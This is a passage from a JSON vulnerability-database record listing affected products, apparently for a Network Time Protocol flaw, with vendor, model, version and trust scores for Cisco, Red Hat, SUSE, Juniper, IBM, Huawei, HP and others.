"version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "3000" }, { "model": "download server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "110" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.3" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux computenode optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux computenode", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux client optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.4.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.9.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.7.3" }, { "model": "network time protocol 4.2.7p10", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.7" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.6" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.5" }, { "model": "network time protocol 4.2.4p8@lennon-o-lpv", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.4p7@copenhagen-o", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.4" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.2" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.1.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm server software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "nsm series appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos os 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r3-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r2-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2x51-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.1x50-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.1r4-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.1r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.2x50-d70", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.2r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x44-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 11.4r12-s4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 11.4r12-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "xeon phi 7120p", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "xeon phi 7120a", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "xeon phi 5110p", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "xeon phi 3120a", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.4" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.3" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.2" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.1" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "71005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "71005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "pureflex", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x6" }, { "model": "pureflex", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x6" }, { "model": "pureflex x240m5+pen", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "pureflex x240m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "pureflex x220m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.8.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.7.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.3.0" }, { "model": "nextscale nx360m5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "nextscale nx360m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "idataplex dx360m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "flex system p460", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "flex system p270 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "flex system p260 compute node /fc efd9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system p260", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "flex system p260", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "flex system p24l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "rack v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "x8000" }, { "model": "v1300n v100r002c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tecal xh621 v100r001c00b010", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh320 v100r001c00spc105", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh311 v100r001c00spc100", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh310 v100r001c00spc100", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh5885h v100r003c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "rh5885 v100r003c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "rh5885 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2485 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2288h v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2288e v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2288 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2285h v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2285 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh1288 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "oceanstor uds v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor uds v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s2600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor hvs88t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor hvs85t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor 18800f v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "high-density server dh628 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh620 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "fusionsphere openstack v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c01spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r005c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusionaccess v100r005c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusionaccess v100r005c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vcn3000 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace usm v200r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace uc v200r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace uc v200r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace uc v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2980 v200r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2980 v100r001c02spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2980 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace ivs v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c50", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c32", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cad v100r001c01lhue01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight uc\u0026c v100r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight uc\u0026c v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight network v200r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight network v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight network v200r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e6000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dc v100r002c01spc001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wx5004-ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.10" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.01" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.2" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.1" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "vcx", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "u200s and cs (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "u200a and m (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "tcp/ip services for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.7" }, { "model": "secblade iii (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "secblade fw (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr50 g2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr50", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr30-1x", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr30-16", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr30", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr20-1x (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr20-1x", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5-0" }, { "model": "msr20 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr1000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9xx5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "93x5)0" }, { "model": "msr 50-g2 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "505)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "30-1x5)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "30-165)0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "305)0" }, { "model": "hsr6800 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hsr6602 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp870 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp850 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp830 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp6000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "f5000-c/s (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f5000-a (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f1000-s-ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f1000-e (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "f1000-a-ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "a6600 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "9500e (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "88005)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75005)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58305)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58205)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58005)0" }, { "model": "5500si (comware", 